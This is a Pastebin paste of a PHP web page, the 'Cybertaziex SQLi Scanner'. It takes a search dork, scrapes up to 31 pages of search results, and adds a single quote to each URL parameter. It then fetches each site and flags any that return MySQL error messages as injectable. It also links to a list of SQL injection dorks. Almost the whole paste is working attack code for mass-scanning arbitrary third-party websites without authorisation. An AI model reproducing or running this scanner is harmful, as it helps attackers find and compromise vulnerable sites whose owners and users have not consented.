Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>Cybertaziex SQLi Scanner</title>
- <link rel="SHORTCUT ICON" href="http://i1237.photobucket.com/albums/ff474/cybertaziex/bendera_merah_putih.gif">
- </head>
- <body>
- <body style="background-image: url('http://i1237.photobucket.com/albums/ff474/cybertaziex/ground10.png'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
- <center>
- <br/>
- <font color="white" size="5">
- <b>
- SQLi Scanner<br>
- .: Modified by Cybertaziex :.</font></b><br><br>
- <center>
- <strong><a href="http://pastebin.com/eHG8eC7z" target="_blank"><font color="#FFFFFF">Kumpulan Dork Sql Injection</font></a></strong><font color="orange"><br>
- </font>
- </center><font color='orange'><br><br></font>
- <form method="post" action="">
- <font color='red'>Dork</font> : <input type="text" value="Dork !!" name="dork" size="20"/>
- <input type="submit" name="scan" value="Scan">
- </form>
- </center>
- <?php
- ob_start();
- set_time_limit(0);
- if (isset($_POST['scan'])) {
- $first = "startgoogle.startpagina.nl/index.php?q=";
- $sec = "&start=";
- $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
- for($id=0 ; $id<=30; $id++){
- $page=$id*10;
- $dork=urlencode($_POST['dork']);
- $url = $first.$dork.$sec.$page;
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
- $result = curl_exec($curl);
- curl_close($curl);
- preg_match_all($reg,$result,$matches);
- foreach($matches[1] as $site){
- $url = preg_replace("/=/", "='", $site);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url);
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
- curl_setopt($curl,CURLOPT_TIMEOUT,'5');
- $GET=curl_exec($curl);
- if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
- echo '<center><b><font color="#E10000">Found : <a href="'.$url.'">'.$url.'</a></b></font></center>';
- ob_flush();flush();
- }else{
- echo '<center><font color="#FFFF00"><b>'.$url.'</b></font></center>';
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ?>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement